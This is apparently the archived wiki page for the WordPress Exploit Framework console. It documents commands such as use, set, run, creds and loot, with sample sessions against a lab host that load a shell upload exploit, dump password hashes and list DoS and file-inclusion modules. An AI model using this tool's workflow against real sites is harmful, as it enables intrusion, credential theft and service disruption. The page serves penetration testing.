This repository was archived by the owner on Oct 22, 2020. It is now read-only.
Uh oh!
There was an error while loading.Please reload this page.
- Notifications
You must be signed in to change notification settings - Fork263
Supported Commands
Rob edited this pageAug 11, 2018 ·2 revisions
Changes the context of the session back to before loading the current module.
wpxf [exploit/shell/admin_shell_upload] > backwpxf >Check if the currently loaded module can be used against the specified target.
wpxf [exploit/shell/admin_shell_upload] > check [!] Target appears to be vulnerablewpxf [exploit/shell/admin_shell_upload] >Clear the screen.
List the credentials stored in the current workspace.
wpxf > creds ID Host Username Password Type -- --------------- -------- -------- ----- 13 wordpress.vm:80 root toor plain 14 wordpress.vm:80 test plainwpxf >Delete the credential with the matching [id] number.
wpxf > creds -d 8 [+] Deleted credential 8wpxf >Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wordpress.vm [+] Globally set the value of host to wordpress.vmwpxf > use exploit/shell/admin_shell_upload [+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>wpxf [exploit/shell/admin_shell_upload] > show options Module options: Name Current Setting Required Description ------------------- --------------- -------- ------------------------------------------- host wordpress.vm true Address of the target host. http_client_timeout 5 true Max wait time in seconds for HTTP responses password true The WordPress password to authenticate with port 80 true Port the remote host is listening on proxy false Proxy address ([protocol://]host:port) ssl false true Use SSL/HTTPS for all requests target_uri / true Base path to the WordPress application username true The WordPress username to authenticate with verbose false true Enable verbose output vhost false HTTP server virtual hostwpxf [exploit/shell/admin_shell_upload] >Unset a global option set with thegset command.
wpxf > gunset host [+] Removed the global setting for hostwpxf >Display information about the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > info Name: Admin Shell Upload Module: exploit/shell/admin_shell_upload Disclosed: 2015-02-21 Provided by: rastating Module options: Name Current Setting Required Description ---------- --------------- -------- ------------------------------------------- host wordpress.vm true Address of the target host. password toor true The WordPress password to authenticate with port 80 true Port the remote host is listening on proxy false Proxy address ([protocol://]host:port) ssl false true Use SSL/HTTPS for all requests target_uri / true Base path to the WordPress application username root true The WordPress username to authenticate with verbose false true Enable verbose output vhost false HTTP server virtual host Description: This module will generate a plugin, pack the payload into it and upload it to a server running WordPress; providing valid admin credentials are used.wpxf [exploit/shell/admin_shell_upload] >List the loot collected from targets in the current workspace.
wpxf > loot ID Host Filename Notes Type -- --------------- ----------------------- ------------------------------------- --------- 1 wordpress.vm:80 2018-07-14_15-00-56.csv Registered users and e-mail addresses user list All filenames are relative to /home/rastating/.wpxf/lootwpxf >Delete the loot item with the matching [id] number.
wpxf > loot -d 1 [+] Deleted item 1wpxf >Print the content of the loot item with the matching [id] number.
wpxf > loot -p 2Email,Name"lPBrOHC@mBeTjaAGGh.com","atgvrf""gSLzaYG@uZVUAeSJvj.com","dowzvc""AMfWgAH@uDNuULjBQv.com","efhkjv""halFIgH@CYqrzDzwQU.com","omquqt""root@wordpress.vm","root"wpxf >Exit the WordPress Exploit Framework prompt.
Re-build the module cache.
wpxf > rebuild_cache [!] Refreshing the module cache...wpxf >Run the currently loaded module.
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run [-] Determining database prefix... [-] Dumping user hashes... Username Hash -------- ----------------------------------- root $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80 ATgVrF $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g. DOWzVC $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB. OmQUqt $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/ eFhkJv $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe. [+] Execution finished successfullywpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >Set an option value for the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > set host wordpress.vm [+] Set host => wordpress.vmwpxf [exploit/shell/admin_shell_upload] >Alias forgset
Search for modules that contain one or more of the specified keywords.
wpxf > search rfi [+] 3 Results for "rfi" Module Title -------------------------------------------------- ---------------------------------------- exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload exploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Uploadwpxf >Show the advanced options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show advanced Name: basic_auth_creds Current setting: Required: false Description: HTTP basic auth credentials (username:password) Name: follow_http_redirection Current setting: true Required: true Description: Automatically follow HTTP redirections Name: max_http_concurrency Current setting: 20 Required: true Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200) Name: proxy_auth_creds Current setting: Required: false Description: Proxy server credentials (username:password) Name: user_agent Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6 Required: false Description: The user agent string to send with all requests Name: verify_host Current setting: true Required: true Description: Enable host verification when using HTTPS Name: wp_content_dir Current setting: wp-content Required: true Description: The name of the wp-content directory.wpxf [exploit/shell/admin_shell_upload] >Show the list of available auxiliary modules.
wpxf > show auxiliary [+] 58 Auxiliaries Module Title -------------------------------------- ----------------------------------------------------------- auxiliary/dos/load_scripts_dos WordPress "load-scripts.php" DoS auxiliary/dos/long_password_dos Long Password DoS auxiliary/dos/post_grid_file_deletion Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion auxiliary/dos/wp_v4.7.2_csrf_dos WordPress 4.2-4.7.2 - CSRF DoS ... wpxf >Show the list of available exploits.
wpxf > show exploits [+] 289 Exploits Module Title -------------------------------------------------------- -------------------------------------------- exploit/rfi/advanced_custom_fields_remote_file_inclusion Advanced Custom Fields Remote File Inclusion exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload exploit/rfi/gwolle_guestbook_remote_file_inclusion Gwolle Guestbook Remote File Inclusion exploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Upload...wpxf >Show the basic options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show options Module options: Name Current Setting Required Description ------------------- --------------- -------- ------------------------------------------- host wordpress.vm true Address of the target host. http_client_timeout 5 true Max wait time in seconds for HTTP responses password true The WordPress password to authenticate with port 80 true Port the remote host is listening on proxy false Proxy address ([protocol://]host:port) ssl false true Use SSL/HTTPS for all requests target_uri / true Base path to the WordPress application username true The WordPress username to authenticate with verbose false true Enable verbose output vhost false HTTP server virtual hostwpxf [exploit/shell/admin_shell_upload] >Unset an option set with theset command.
wpxf [exploit/shell/admin_shell_upload] > unset host [+] Unset hostwpxf [exploit/shell/admin_shell_upload] >Alias forgunset
Load the specified module into the current context.
wpxf > use exploit/shell/admin_shell_upload [+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>wpxf [exploit/shell/admin_shell_upload] >List the available workspaces.
wpxf > workspace [-] default (active) [-] testwpxf >Switch to the[name] workspace.
wpxf > workspace test [+] Switched to workspace: testwpxf >Add a new workspace.
wpxf > workspace -a wiki [+] Added workspace: wikiwpxf >Delete the[name] workspace.
wpxf > workspace -d wiki [+] Deleted workspace: wikiwpxf >